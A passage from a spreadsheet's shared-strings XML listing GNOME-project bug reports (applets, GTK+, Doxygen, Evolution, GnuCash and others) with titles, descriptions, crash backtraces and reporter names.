    <t>GNOME-APPLETS-82652</t>
  </si>
  <si>
    <t>mini-commander</t>
  </si>
  <si>
    <t>History list should change sorting based on panel position</t>
  </si>
  <si>
    <t>I have my mini-commander (Command Line 1.102.0) on my menu panel at the top
of the screen. mini-commander correctly pops the history list downward but
it displays the oldest history at the top and the most recent at the
bottom. Since my history list is longer than the pop-down list I am
required to scroll down to the bottom of the list before I can select the
most recent commands.
My suggestion is to sort the history list so that the most recent commands
are displayed at the top but only when mini-commander is in a panel on the
top of the screen.
Thanks.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-164548</t>
  </si>
  <si>
    <t>Gnome-mixer crash when selecting ALSA instead of OSS for device control.</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: gnome-applets
Severity: major
Version: GNOME2.9.4 2.9.x
Gnome-Distributor: Ubuntu
Synopsis: Gnome-mixer crash when selecting ALSA instead of OSS for device control.
Bugzilla-Product: gnome-applets
Bugzilla-Component: mixer
Bugzilla-Version: 2.9.x
BugBuddy-GnomeVersion: 2.0 (2.8.0)
Description:
Description of the crash:
Application has quit unexpectedly.
Steps to reproduce the crash:
1. Use M-Audio Revolution 7.1 soundcard
2. Rightclick volume icon and go to device control
3. Select ALSA instead of OSS
Expected Results:
Crash
How often does this happen?
Always when ALSA is selected
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/libexec/mixer_applet2'
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1224771264 (LWP 8827)]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0xffffe410 in ?? ()
#0  0xffffe410 in ?? ()
#1  0xbfffe9ac in ?? ()
#2  0x00000000 in ?? ()
#3  0xbfffe90c in ?? ()
#4  0xb7c86413 in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#5  0xb7e65bab in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#6  
#7  0x0804d868 in gnome_volume_applet_setup ()
#8  0x0804c91c in gnome_volume_applet_setup ()
#9  0x0804ebb7 in gnome_volume_applet_dock_change ()
#10 0xb7eb0442 in panel_applet_marshal_BOOLEAN__STRING ()
   from /usr/lib/libpanel-applet-2.so.0
#11 0xb7816351 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#12 0xb778a80d in bonobo_closure_invoke_va_list ()
   from /usr/lib/libbonobo-2.so.0
#13 0xb778aa4e in bonobo_closure_invoke () from
/usr/lib/libbonobo-2.so.0
#14 0xbfffef20 in ?? ()
#15 0xbfffef80 in ?? ()
#16 0x08000000 in ?? ()
#17 0xb768f1c0 in g_thread_use_default_impl () from
/usr/lib/libglib-2.0.so.0
#18 0x08058c0c in ?? ()
#19 0xbfffeed8 in ?? ()
#20 0xb76929f7 in ?? () from /usr/lib/libgthread-2.0.so.0
#21 0xbfffef20 in ?? ()
#22 0xbfffeee0 in ?? ()
#23 0x0dd641a5 in ?? ()
#24 0xb7eb4000 in ?? ()
#25 0x08053053 in ?? ()
#26 0x08053030 in ?? ()
#27 0xbfffef68 in ?? ()
#28 0x00000014 in ?? ()
#29 0xbfffef88 in ?? ()
#30 0x00000000 in ?? ()
#31 0x00000000 in ?? ()
#32 0x00000000 in ?? ()
#33 0x00000000 in ?? ()
#34 0x00000000 in ?? ()
#35 0x00000000 in ?? ()
#36 0x00000000 in ?? ()
#37 0x00000000 in ?? ()
#38 0x00000000 in ?? ()
#39 0x00000000 in ?? ()
#40 0x00000000 in ?? ()
#41 0x00000000 in ?? ()
#42 0x00000000 in ?? ()
#43 0x00000000 in ?? ()
#44 0x00000000 in ?? ()
#45 0x00000014 in ?? ()
#46 0x00000000 in ?? ()
#47 0x00000000 in ?? ()
#48 0x00000000 in ?? ()
#49 0x00000000 in ?? ()
#50 0xb7eb36ac in ?? () from /usr/lib/libpanel-applet-2.so.0
#51 0x080e6fa0 in ?? ()
#52 0x080e6f20 in ?? ()
#53 0xbfffef98 in ?? ()
#54 0xb7ff6730 in _dl_map_object_deps () from /lib/ld-linux.so.2
#55 0xb7eae32e in panel_applet_get_background ()
   from /usr/lib/libpanel-applet-2.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2005-01-18 22:03 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product gnome-applets.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was kaga0008@comcast.net.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>kaga0008</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-74919</t>
  </si>
  <si>
    <t>[obsolete] File types and programs</t>
  </si>
  <si>
    <t>File Types and Programs dialog says File Types and internet services in the window border</t>
  </si>
  <si>
    <t>File Types and Programs dialog says File Types and internet services in
the window border</t>
  </si>
  <si>
    <t>DOXYGEN-500928</t>
  </si>
  <si>
    <t>Bug in handling of triple-quoted strings in Python</t>
  </si>
  <si>
    <t>Operatingsystem: Linux Debian (testing)
Parsing Python code Doxygen does not handle variables correctly which contain 
a triple quoted string. Upon the first occurence of such a variable the
variable itself and everything following (classes methods ...) will
not show up in the generated documentation. An example follows.
Best regards
- foosel
Python code:
	#!/usr/bin/env python
	var = content
	triple_var = special content
	class Foo:
	    pass
Doxygen config options:
	OPTIMIZE_OUTPUT_JAVA   = YES
	EXTRACT_ALL            = YES
	EXTRACT_PRIVATE        = YES
	EXTRACT_STATIC         = YES
	HIDE_UNDOC_MEMBERS     = NO
	HIDE_UNDOC_CLASSES     = NO
Expected output:
	NAME
	       buggy.py -
	SYNOPSIS
	   Namespaces
	       namespace buggy
	   Classes
	       class buggy.Foo
	   Variables
	       string buggy.var = â€™contentâ€™
	       string buggy.triple_var = â€™special contentâ€™
	Author
	       Generated automatically by Doxygen for Test from the source code.
Actual output:
	NAME
	       buggy.py -
	SYNOPSIS
	   Namespaces
	       namespace buggy
	   Variables
	       string buggy.var = â€™contentâ€™
	Author
	       Generated automatically by Doxygen for Test from the source code.</t>
  </si>
  <si>
    <t>gina</t>
  </si>
  <si>
    <t>DOXYGEN-476562</t>
  </si>
  <si>
    <t>@copydoc of operator documentation generates &gt; &lt; or &amp; characters in the XML output</t>
  </si>
  <si>
    <t>Please describe the problem:
@copydoc of operator documentation generated &gt; &lt; and &amp; characters in the XML output. The XML files ar not valid and combine.xslt fails.
Steps to reproduce:
1. Write a copydoc to an operator containing  or &amp; in its name
Example:
@copydoc operator&lt;&lt;(ostream&amp;IloAlgorithm::Status)
2. Generate XML output
3. Launch Doxygen combine.xslt stylesheet on the output
Actual results:
Doxygen generates:
and combine.xslt fails
Expected results:
Doxygen should generate a valid XML file with:
and combine.xslt should execute successfully.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>claire.chardiny</t>
  </si>
  <si>
    <t>GNOME-APPLETS-308738</t>
  </si>
  <si>
    <t>Preference can't handle devices with the same names.</t>
  </si>
  <si>
    <t>Please describe the problem:
In Volume Control Preference window.  I have two devices
with the same name wave (for capture and playback).  No
matter which one I choose the widget will control the
capture wave device.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>GDM-164023</t>
  </si>
  <si>
    <t>GDM dialog fails to respect STRUTS/panels when re-drawing itself after a failed login</t>
  </si>
  <si>
    <t>1. Configure gdm for login with accessibility support and create a gesture
listener to launch gnopernicus/srcore with magnification on (in vertical
half-screen magnification)
2. 'gdm-restart' to sync everything up
3. At the gdm screen make the gesture and bring up the screen magnifier in
vertical half-screen magnification.  Note that the gdm dialog nicely gets out of
the way.
4. Click the OK button without ever entering a username/password.  The gdm
dialog re-draws itself but this time places itself in the middle of the screen
no longer out of the way of the magnified view (BUG).</t>
  </si>
  <si>
    <t>GTK+-412331</t>
  </si>
  <si>
    <t>GTK+ 2.0 Tutorial - C.3.2. scribble-xinput.c compile error</t>
  </si>
  <si>
    <t>gcc scribble-xinput.c -o scribble `pkg-config --cflags --libs gtk+-2.0`
scribble-xinput.c:181: error: two or more data types in declaration of `main'.
There is a minor typo/compile error in scribble-xinput.c
Near the end of http://www.gtk.org/tutorial/x2928.html#AEN2933 the main function has too many return types.
There is a:
void
int
main ()
instead of just
int
main ()
An obvious fix.</t>
  </si>
  <si>
    <t>console.cowboy</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-13577</t>
  </si>
  <si>
    <t>Inability to add mime type after deleting one of same name</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.0
Synopsis: Inability to add mime type after deleting one of same name
Class:    sw-bug
System: Linux 2.2.14 i586 unknown
C compiler: 2.95.1
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.2.1
libxml: 1.8.7
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
In the mime-types capplet if you delete a mime type and then add it
again without clicking the okay button you will be told that that mime
type already exists
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:28 -------
This bug was previously known as bug 13577 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=13577
Originally filed under the control-center product and general component.
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (foxtrot@autobahn.mb.ca) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>foxtrot</t>
  </si>
  <si>
    <t>BEAGLE-335924</t>
  </si>
  <si>
    <t>HIG Fixes for Beagle Prefrence Dialogs</t>
  </si>
  <si>
    <t>I am attaching a patch to HIGify the dialogs in settings.glade.  The attached patch corrects the widget layout and spacing label capitalization and adds mnemonics.</t>
  </si>
  <si>
    <t>GTK+-141072</t>
  </si>
  <si>
    <t>tests/testgtk.c: many warnings fixed</t>
  </si>
  <si>
    <t>All fixed:
testgtk.c: In function `create_gridded_geometry':
testgtk.c:1983: warning: dereferencing type-punned pointer will break
strict-aliasing rules
testgtk.c: In function `create_key_lookup':
testgtk.c:4159: warning: dereferencing type-punned pointer will break
strict-aliasing rules
testgtk.c: In function `find_widget_at_pointer':
testgtk.c:11253: warning: dereferencing type-punned pointer will break
strict-aliasing rules
Not fixed (not sure whether to remove these functions or not...):
testgtk.c: At top level:
testgtk.c:7304: warning: `opacity_toggled_cb' defined but not used
testgtk.c:7315: warning: `palette_toggled_cb' defined but not used</t>
  </si>
  <si>
    <t>csherlock</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-414269</t>
  </si>
  <si>
    <t>change keyboard when default is selected instead of list order change</t>
  </si>
  <si>
    <t>gnome-keyboard-properties
I have 2 keyboards in the keyboard list
American and Belgium
I selected Belgium as default but my keyboard was still American
I had to put the Belgium keyboard before the American keyboard in list to make it work.
Cant the keyboard change in the default keyboard when you select it?</t>
  </si>
  <si>
    <t>BEAGLE-380328</t>
  </si>
  <si>
    <t>try to recover from crashes instead of purging the index</t>
  </si>
  <si>
    <t>Summary says it all. Mostly a place holder for patches and crasher test documents.</t>
  </si>
  <si>
    <t>EVOLUTION-209209</t>
  </si>
  <si>
    <t>Mail app crashes</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.13.99
Synopsis: Mail app crashes
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
This has happened twice today since downloading the latest build last
night. The first time it happened when I was reading e-mail going from
one message to the next. The second time (this time) it happened while I
was away from my computer. Evolution was open at the Summary page and
the screen saver was going.
Debugging Information:
[New Thread 1024 (LWP 19767)]
[New Thread 2049 (LWP 19784)]
[New Thread 1026 (LWP 19785)]
[New Thread 7172 (LWP 20610)]
0x40a10519 in __wait4 () from /lib/i686/libc.so.6
#0  0x40a10519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40a809e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406bf563 in waitpid (pid=21891 stat_loc=0xbffff1bc options=0)
    at wrapsyscall.c:172
#3  0x402ed262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x08096212 in segv_redirect (sig=11) at main.c:67
#5  0x406bd935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136960016 esi = 18 ebp = 3221222800 esp = 3221222788 ebx = 136960160 edx = 59997 ecx = 18 eax = 4294967292 trapno = 0 err = 0 eip = 1084445223 cs = 35 __csh = 0 eflags = 534 esp_at_signal = 3221222788 ss = 43 __ssh = 0 fpstate = 0xbffff308 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40a35227 in __poll (fds=0x829d810 nfds=18 timeout=599954)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x4057fa74 in g_main_poll (timeout=599954 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x4057f465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x4057f7e8 in g_main_run (loop=0x8134bf0) at gmain.c:935
#11 0x4049465b in gtk_main () at gtkmain.c:524
#12 0x407b5547 in bonobo_main () at bonobo-main.c:283
#13 0x080963c1 in main (argc=3 argv=0xbffff82c) at main.c:141
#14 0x40972177 in __libc_start_main (main=0x809623c  argc=3 
    ubp_av=0xbffff82c init=0x8064bc4  fini=0x80c97cc  
    rtld_fini=0x4000e184  stack_end=0xbffff824)
    at ../sysdeps/generic/libc-start.c:129
Thread 4 (Thread 7172 (LWP 20610)):
#0  0x409838a5 in __sigsuspend (set=0x42be392c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406bd0d9 in __pthread_wait_for_restart_signal (self=0x42be3c00)
    at pthread.c:934
#2  0x406b9c5c in pthread_cond_wait (cond=0x8136888 mutex=0x8136868)
    at restart.h:34
#3  0x400764cc in e_msgport_wait (mp=0x8136840) at e-msgport.c:193
#4  0x40076bf3 in thread_dispatch (din=0x81367f0) at e-msgport.c:514
#5  0x406babfd in pthread_start_thread (arg=0x42be3c00) at manager.c:262
Thread 3 (Thread 1026 (LWP 19785)):
#0  0x409838a5 in __sigsuspend (set=0x4138692c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406bd0d9 in __pthread_wait_for_restart_signal (self=0x41386c00)
    at pthread.c:934
#2  0x406b9c5c in pthread_cond_wait (cond=0x81367e0 mutex=0x81367c0)
    at restart.h:34
#3  0x400764cc in e_msgport_wait (mp=0x8136798) at e-msgport.c:193
#4  0x40076bf3 in thread_dispatch (din=0x8136748) at e-msgport.c:514
#5  0x406babfd in pthread_start_thread (arg=0x41386c00) at manager.c:262
Thread 2 (Thread 2049 (LWP 19784)):
#0  0x40a35227 in __poll (fds=0x8149af4 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x406ba900 in __pthread_manager (arg=0x1a) at manager.c:136
Thread 1 (Thread 1024 (LWP 19767)):
#0  0x40a10519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40a809e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406bf563 in waitpid (pid=21891 stat_loc=0xbffff1bc options=0)
    at wrapsyscall.c:172
#3  0x402ed262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x08096212 in segv_redirect (sig=11) at main.c:67
#5  0x406bd935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136960016 esi = 18 ebp = 3221222800 esp = 3221222788 ebx = 136960160 edx = 59997 ecx = 18 eax = 4294967292 trapno = 0 err = 0 eip = 1084445223 cs = 35 __csh = 0 eflags = 534 esp_at_signal = 3221222788 ss = 43 __ssh = 0 fpstate = 0xbffff308 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40a35227 in __poll (fds=0x829d810 nfds=18 timeout=599954)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x4057fa74 in g_main_poll (timeout=599954 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x4057f465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x4057f7e8 in g_main_run (loop=0x8134bf0) at gmain.c:935
#11 0x4049465b in gtk_main () at gtkmain.c:524
#12 0x407b5547 in bonobo_main () at bonobo-main.c:283
#13 0x080963c1 in main (argc=3 argv=0xbffff82c) at main.c:141
#14 0x40972177 in __libc_start_main (main=0x809623c  argc=3 
    ubp_av=0xbffff82c init=0x8064bc4  fini=0x80c97cc  
    rtld_fini=0x4000e184  stack_end=0xbffff824)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40a10519 in __wait4 () from /lib/i686/libc.so.6
#0  0x40a10519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40a809e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x406bf563 in waitpid (pid=21891 stat_loc=0xbffff1bc options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff1bc
options = 0
result = 0
oldtype = 0
#3  0x402ed262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 21
in_segv = 1
pid = 0
#4  0x08096212 in segv_redirect (sig=11) at main.c:67
	in main.c
sig = 11
#5  0x406bd935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136960016 esi = 18 ebp = 3221222800 esp = 3221222788 ebx = 136960160 edx = 59997 ecx = 18 eax = 4294967292 trapno = 0 err = 0 eip = 1084445223 cs = 35 __csh = 0 eflags = 534 esp_at_signal = 3221222788 ss = 43 __ssh = 0 fpstate = 0xbffff308 oldmask = 2147483648 cr2 = 0}) at signals.c:97
	in signals.c
signo = 0
__value = 0x80961f0 U\211Ã¥SP\213]\bÃ¨Â¯\026Ã½Ã¿\213\025\020&lt;\016\b9Ãu\025\203Ã¬\fSÂ¡Ã¨5\016\bÃ¿Ã\203Ã„\020\213]Ã¼Ã‰Ãƒ\211Ã¶\203Ã¬\bSRÃ¨vÃ¿Ã¼Ã¿\203Ã„\020Ã‡E\b
#6  
No locals.
#7  0x40a35227 in __poll (fds=0x829d810 nfds=18 timeout=599954)
    at ../sysdeps/unix/sysv/linux/poll.c:63
	in ../sysdeps/unix/sysv/linux/poll.c
fds = (struct pollfd *) 0x829d810
nfds = 3221221820
timeout = 0
resultvar = 136960016
Unknown reporter: ksmith@chartwelltechnology.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>ksmith</t>
  </si>
  <si>
    <t>XMLSEC-120230</t>
  </si>
  <si>
    <t>Online verification fails since yesterday</t>
  </si>
  <si>
    <t>Hi
I use your online verification frequently as I'm working on a tool to sign 
XML.
Since yesterday with the same document that worked before I get the 
following error:
xmlSecSimpleX509MngrAddTrustedCert: x509 
file /etc/httpd/conf/ssl.crt/merlin.crt load failed
Error: failed to read Merlin's CA
Now I tested with your example xml signature-enveloping-rsa.xml - same 
result. Even left blank results in the same error message.
Plz give me a hint if you think it's me that does something wrong.
Greez from Switzerland
mic</t>
  </si>
  <si>
    <t>Hunziker</t>
  </si>
  <si>
    <t>GTK+-66447</t>
  </si>
  <si>
    <t>misprint in documentation for gtk_tree_view_column_set_attributes ()</t>
  </si>
  <si>
    <t>Documetation for gtk_tree_view_column_set_attributes () says:
The attributes should be in attribute/column order as in
gtk_tree_view_column_add_attribute.
I assume that 'gtk_tree_view_column_add_attribute' should be
'gtk_tree_view_column_add_attribute()'.</t>
  </si>
  <si>
    <t>GNUMERIC-98723</t>
  </si>
  <si>
    <t>Save confirmation alert is not intuitive</t>
  </si>
  <si>
    <t>The save confirmation alert in Gnumeric is not intuitive and does not
comply with the GNOME Human Interface Guidelines. A good implementation can
be seen in MrProject. I especially appreciate the stock exit icon on the
`Close without saving' button.
Additional Information:
http://developer.gnome.org/projects/gup/hig/1.0/windows.html#alerts-confirmation
Version Details:
gnumeric-1.1.12.tar.bz2</t>
  </si>
  <si>
    <t>evert.verhellen</t>
  </si>
  <si>
    <t>NAUTILUS-95147</t>
  </si>
  <si>
    <t>scaled icons are squashed ...</t>
  </si>
  <si>
    <t>Running the latest stable branch snapshot with SVG icons - results in all
the scalable icons being squashed in the vertical plane.
Most odd prolly a factor of 2 off somewhere.</t>
  </si>
  <si>
    <t>PANGO-116822</t>
  </si>
  <si>
    <t>redundant call to pango_layout_line_get_extents()</t>
  </si>
  <si>
    <t>The first thing pango_ft2_render_layout_line() does it to call
pango_layout_line_get_extents(). The resulting rectangle is however never
used. The attached patch removes this redundant function call. Tested with
gimp-1.3.</t>
  </si>
  <si>
    <t>GTK+-341332</t>
  </si>
  <si>
    <t>Unset background in more places</t>
  </si>
  <si>
    <t>When a child window is moved or resized it is possible to get rid of some flicker by temporarily unsetting the background of the parent window. Also the corresponding piece of the parent window can be invalidated so that we don't have to wait for the expose event to arrive.
This patch does that.</t>
  </si>
  <si>
    <t>GSTREAMER-102565</t>
  </si>
  <si>
    <t>gstfileindex is borked</t>
  </si>
  <si>
    <t>The attached patch fixes the following problems:
+ gstfileindex tries to allocate writer_ids even if the index is empty
(reverse logic).
+ g_array_index didn't do what i expected.  Pass an explicit stride around
to  calculate record offsets.
+ Store index records in increasing order instead of decreasing.
+ Use temporaries for most GINT64_TO/FROM_BE macros.  This probably isn't
needed but it makes it easier to understand and debug.
+ Fix the indexers testsuite so it compiles again.  Pass memindex or
fileindex on the command line.
+ In cache1.c compare actual results with expected results.</t>
  </si>
  <si>
    <t>jpritikin</t>
  </si>
  <si>
    <t>GARNOME-326560</t>
  </si>
  <si>
    <t>Hal - Usb device detection does not working (flash drive ipod)</t>
  </si>
  <si>
    <t>Hi
I have tried to start hal+dbus  with custom made scripts and docs given in README. It works fine but usb device like flash drive and ipod are not mounted/detected. To make the icon for ipod appear in disk mount applet I will have to restart the pc with ipod connected. When i try to mount the applet i get the message ' /dev/sda1 entry not found in /etc/fstab'. The icon in disk mount applet remains even if the device is unplugged. Another user has reported similar problems but he says that the device is detected when halis stopped. Please make sure that this nagging problems is solved at the earliest.
The scripts i have setup for starting dbus/hal isworking and i has no problem mounting cdrom. only problem is with usb devices.
garnome-2.12.2.1
hal-0.5.5.1
Regards
Manu Balasree</t>
  </si>
  <si>
    <t>garnome-maint</t>
  </si>
  <si>
    <t>manubalasree</t>
  </si>
  <si>
    <t>BEAGLE-392675</t>
  </si>
  <si>
    <t>Uncontrolled Log File Growth</t>
  </si>
  <si>
    <t>Granted this is a much bigger issue in the older versions now that debugging is turned off and at the moment this is more a placeholder should we get more reports from people running the latest and greatest but I wanted us to be aware.</t>
  </si>
  <si>
    <t>GIMP-159510</t>
  </si>
  <si>
    <t>Empty entry in .gimp-2.2/documents causes segfault</t>
  </si>
  <si>
    <t>I don't know why but the following line was introduced in my
.gimp-2.2/documents last time I played with the Gimp.
(document )
The result with such a line is that the Gimp segfaults on every attempt to
open/save a file. The cure was to remove the line and restart the gimp. Thanks
to Yosh who help me find the bug.</t>
  </si>
  <si>
    <t>airfullbete</t>
  </si>
  <si>
    <t>PESSULUS-572357</t>
  </si>
  <si>
    <t>Use gtk.show_uri for help</t>
  </si>
  <si>
    <t>Patch replaces gnome.help_display_desktop with gtk.show_uri. Also checks for errors on help and prints a (translated) string.
Bumps pygtk dependency to 2.13.0</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-91098</t>
  </si>
  <si>
    <t>Can't find a playable configuration ...</t>
  </si>
  <si>
    <t>http://bugs.debian.org/153677
Gnome Mahjongg is unable to find a playable configuration when shuffling
a board like this:
 +---+---+---+
 |   |   |   |
 | +---+---+ |
 | |   |   | |
 +-|   |   |-+
 | |   |   | |
 | ----+---+ |
 |   |   |   |
 +---+---+---+
As 2 tiles are playable it should be possible to find a configuration
where the two tiles have the same picture.
It should only ever fail to find a playable configuration if only one
tile is playable.
Screenshot available if needed.
Ask Malcolm Parsons  for the screenshot.
thx.</t>
  </si>
  <si>
    <t>EVOLUTION-239757</t>
  </si>
  <si>
    <t>Cannot delete reminder for appointment</t>
  </si>
  <si>
    <t>Snapshot: (031203)
Create new appointment ADD a new reminder. Select the reminder and the
Delete button doesn't ever become available.</t>
  </si>
  <si>
    <t>GNUCASH-570887</t>
  </si>
  <si>
    <t>Crash when copying new transaction</t>
  </si>
  <si>
    <t>Steps to reproduce:
1) Create a new file (or open an existing one)
2) Open an account
3) Open a new transaction.  Enter a value but don't press enter (leave the transaction open).
4) Click on Transaction-&gt;Copy transaction
Stack trace:
In unknown file:
   ?: 0* [gnc:transaction-&gt;transaction-scm # #f]
   ?: 1* (letrec (#) (gnc:make-transaction-scm # # # ...))
In /usr/local/share/gnucash/scm/engine-interface.scm:
 226: 2  [gnc:make-transaction-scm dd63bdcd4aebe95c6130530a855c1e10 # # ... ...
 238: 3*  [trans-splits 0]
 221: 4   (let ((split #)) (if (null? split) (quote ()) (cons # #)))
    ...
 224: 5   [cons ...
 224: 6*   [gnc:split-&gt;split-scm # #f]
  97: 7    [gnc:make-split-scm 964ba0b45b4ac08d91465ff709dd0a9c # ...]
In unknown file:
   ?: 8    [make-struct # 0 ... ...
: While evaluating arguments to make-struct in expression (make-struct (quote #) 0 ...):
: Unbound variable: account-guid
Other information:
This crash also happens in 2.2.4</t>
  </si>
  <si>
    <t>alan.christopher.jenkins</t>
  </si>
  <si>
    <t>GTK+-398336</t>
  </si>
  <si>
    <t>'Desktop' location in 'Places' sidebar behaves erroneously</t>
  </si>
  <si>
    <t>Please describe the problem:
When saving files the 'Places'-sidebar of the file chooser dialog doesn't correctly list its items in particular the Desktop item. Instead an empty selectable but broken item appears.
Navigating back and forth to some other directory usually lets the Desktop icon reappear.
I have taken a screenshot and put it on imageshack:
http://img215.imageshack.us/img215/1645/filedialogbugnm5.png
Steps to reproduce:
1. Open a GTK-application e.g. gedit
2. Select File --&gt; Save As...
3. Click Browse for other folders
The Desktop icon in 'Places' should have vanished.
Actual results:
Expected results:
List and render the Places items correctly.
Does this happen every time?
Yes.
Other information:
I'm using GNOME 2.16.1 (and whatever version of Gtk+ comes with that) on Ubuntu 6.10 (Edgy Eft).
I have also started a thread on the Ubuntu forums where other people confirmed having the same problem:
http://ubuntuforums.org/showthread.php?p=2034715#post2034715</t>
  </si>
  <si>
    <t>m.kaeppler</t>
  </si>
  <si>
    <t>EVOLUTION-339628</t>
  </si>
  <si>
    <t>non-default Draft folders are Draft folders too</t>
  </si>
  <si>
    <t>So the bahvior of the Drafts folder changed in 2.6 -- now a draft is visually displayed like an unread message in any general mail folder. That is if there is any draft in the folder the Drafts folder in the tree is bold and the count of drafts is shown (as if they where unread).
While I do not particularly like this behavior I kind of do understand the idea behind this. But that's a different story anyway. )
The bug is that the logic is broken. The above described new behavior applies to the the default On This Computer / Drafts folder *only*. However this should be either true for *all* Draft folders or not at all. Be consistent!
Steps to reproduce:
* Crate a new folder nondefault drafts.
* Edit your Mail Account settings change the draft folder
  to use *that* new folder.
Results: The original Drafts folder still acts as if it where a Drafts folder with respect to the above described behavior. However the new folder does not despite the fact that new folder actually is a Drafts folder.
Again please be consistent. Do *not* special-case special folders that actually are not special in any way. Respect the users settings rather than hardcoding stuff like this.
See bug 323145 for a related issue.</t>
  </si>
  <si>
    <t>GNOME-VFSMM-135735</t>
  </si>
  <si>
    <t>GNOME-VFSMM</t>
  </si>
  <si>
    <t>New classes and async support.</t>
  </si>
  <si>
    <t>Here it is: async support and also Volumes Drives and a VolumeMonitor.</t>
  </si>
  <si>
    <t>mxpxfifws</t>
  </si>
  <si>
    <t>BLUEFISH-328459</t>
  </si>
  <si>
    <t>Bluefish crashes seemingly randomly after some use</t>
  </si>
  <si>
    <t>Steps to reproduce:
I can't reproduce the bug. It occurs seemingly randomly after some use. Here is
what has caused the crash so far:
1) I indented about 20 lines of text several times in quick succession. CPU was
under severe load when it happened. I could not reproduce the event.
2) Tried changing background colour for a highlighting parameter. Applied
changes and hit F5 to update. On hitting F5 bluefish crashed. Again cannot
reproduce.
3) Selected and deleted about 5 chars of text.
I wonder if undo buffer is maxing out.
Stack trace:
So far I've not had any luck getting a back-trace. As soon as I get one I'll
post it.
Other information:</t>
  </si>
  <si>
    <t>LIBGLADEMM-129848</t>
  </si>
  <si>
    <t>LIBGLADEMM</t>
  </si>
  <si>
    <t>libglademm: Gtk::SeparatorMenuItem is focussable/selectable with the keyboard</t>
  </si>
  <si>
    <t>Interfaces containing menus with HSeparators (Gtk::SeparatorMenuItem):
the separator is selectable with the keyboard when using keyboard
navigation.  The same interface constructed by hand or even
during editing with Glade-2 does not exhibit this undesirable
behaviour.
This may be seen with the standard libglade menu test
(gnomemm/libglademm/examples/menus).
Regards
Roger</t>
  </si>
  <si>
    <t>GNOME-KEYRING-516606</t>
  </si>
  <si>
    <t>Buid break</t>
  </si>
  <si>
